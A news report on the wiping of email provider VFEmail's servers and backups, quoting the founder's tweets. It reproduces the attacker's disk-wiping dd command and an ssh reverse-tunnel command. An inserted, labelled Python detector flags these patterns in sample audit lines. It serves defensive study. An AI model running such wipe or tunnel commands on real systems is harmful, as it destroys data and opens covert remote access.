Email provider VFEmail said it has suffered a catastrophic destruction of all of its servers by an unknown assailant who wiped out almost two decades’ worth of data and backups in a matter of hours.
“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001. “It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”
The ordeal started on Monday when he noticed all the servers for his service were down. A few hours later, VFEmail’s Twitter account reported the attacker “just formatted everything.” The account went on to report that VFEmail “caught the perp in the middle of formatting the backup server.”
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null email@example.com -R 127.0.0.1:30081:127.0.0.1:22 -N
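As an added illustration (not from the article and not VFEmail's own tooling), here is a small Python detector that flags, in a process-audit feed, the two command shapes reported in the tweet above: a dd write from /dev/zero onto a raw block device, and an ssh invocation that disables host-key checking and opens a reverse forward (-R). The audit lines, user names and host names are constructed; dd_extent also works out what the bs/seek/count values quoted above amount to in bytes.

```python
import re
import shlex

# Constructed sample process-audit lines (user<TAB>command); not VFEmail's
# logs. Lines 2 and 3 mirror the shape of the commands VFEmail reported.
SAMPLE_LINES = [
    "backup\tdd if=/data/db.dump of=/mnt/backup/db.dump bs=1M",
    "root\tdd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "ops\tssh -v -oStrictHostKeyChecking=no -oLogLevel=error "
    "-oUserKnownHostsFile=/dev/null relay.example -R 127.0.0.1:30081:127.0.0.1:22 -N",
    "ops\tssh build.internal -- make test",
]

BLOCK_DEV = re.compile(r"^/dev/(da|ada|sd|nvme|vd|xvd|md|mapper/)")  # da0 = FreeBSD disk
NO_HOSTKEY = {"StrictHostKeyChecking=no", "UserKnownHostsFile=/dev/null"}

def dd_opts(argv):
    """Parse dd's key=value operands into a dict."""
    return dict(a.split("=", 1) for a in argv[1:] if "=" in a)

def dd_extent(cmdline):
    """Bytes (start, length) a dd command writes, assuming numeric bs/seek/count."""
    o = dd_opts(shlex.split(cmdline))
    bs = int(o.get("bs", 512))
    return bs * int(o.get("seek", 0)), bs * int(o.get("count", 0))

def classify(cmdline):
    """Return alert tags for one command line; [] means nothing suspicious."""
    argv = shlex.split(cmdline)
    tags = []
    if argv and argv[0] == "dd":
        o = dd_opts(argv)
        if BLOCK_DEV.match(o.get("of", "")):
            tags.append("dd-raw-device-write")
            if o.get("if") in ("/dev/zero", "/dev/urandom"):
                tags.append("dd-wipe-pattern")
    elif argv and argv[0] == "ssh":
        opts = {a[2:] for a in argv if a.startswith("-o")}  # joined -oKey=Value form only
        if opts & NO_HOSTKEY:
            tags.append("ssh-hostkey-check-disabled")
        if "-R" in argv:
            tags.append("ssh-reverse-forward")
    return tags

def scan(lines):
    """Return [(user, tags, cmd)] for every audit line that raised a tag."""
    out = [(u, classify(c), c) for u, _, c in (l.partition("\t") for l in lines)]
    return [h for h in out if h[1]]
```

With the quoted values, dd_extent reports a 4 GiB starting offset and roughly 1.5 TiB of zeroes written, which is why a process-audit or block-device-write alert needs to fire within seconds rather than at the next log review.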
The damage, Romero reported, extended to VFEmail’s “entire infrastructure,” including mail hosts, virtual machine hosts, and a SQL server cluster. The extent of the damage, he suggested, required the hacker to have multiple passwords. “That’s the scary part.”
Someone hacked a mail server and formatted every server including backups.
Not ‘A’, an entire infrastructure.
Mail hosts, VM hosts, sql server cluster, hosted vms.
If they all had one password, sure, but they didn’t. That’s the scary part.
At the time this post was going live, a status page reported that VFEmail was now delivering email again, although it wasn’t clear if service was working for US-based accounts. The page also said that subfolders and filters users had previously set up were no longer in place. Users of free accounts shouldn’t yet send email, and no one should use email clients.
The motivation for the attack wasn’t immediately clear. Most highly destructive attacks in recent years have been part of ransomware rackets that threaten people with catastrophic data loss unless they make big cryptocurrency payments. But sometimes, targets don’t see the ransom messages. It’s also possible that VFEmail fell victim to some sort of personal grudge. Romero didn’t respond to messages seeking comment for this post.
A Web cache shows that VFEmail was founded in 2001 in response to the ILOVEYOU virus that infected tens of millions of Windows computers all around the world a year earlier. The virus got its name because it was transmitted in emails with the subject “I love you.” The service aimed to offer a better email experience by scanning messages for malware on the server.
“We strive to build an economical and redundant system, to provide our users with as much uptime as possible,” VFEmail’s about page said. “As mentioned, VFEmail started with a single machine, but over time we’ve built out, adding systems for load balancing/failover and separating services. Most recently we’ve made use of Virtual Machines in order to keep hardware acquisitions at a minumum [sic], in those cases where it would not impact performance. By separating vital functions, upgrades, updates, and system problems can quickly and easily be isolated from the rest of the system and provide you with uninterrupted accessibility.”
The status page said the destruction came at the hands of a “hacker, last seen as firstname.lastname@example.org.” The IP address, whois records show, has ties to both Daticum and Coolbox hosting services, both in Bulgaria.
“That ip is a VM host,” Romero tweeted. “Feels like a launch pad to me. To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.”
Thanks for the background man! This is scary stuff, tracking the ip it looks like from Bulgaria. Do you suspect revenge or someone trying to hide something more malicious?
That ip is a VM host. Feels like a launch pad to me.
To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.
He went on to say that the attacker used multiple means of access into the VFEmail infrastructure and, as a result, it wasn’t clear that two-factor authentication would have stopped the intrusion.
“2FA only works if the access method was via authentication, as opposed to exploit,” he explained. “At least 3 different methods had to be used to get into everything.”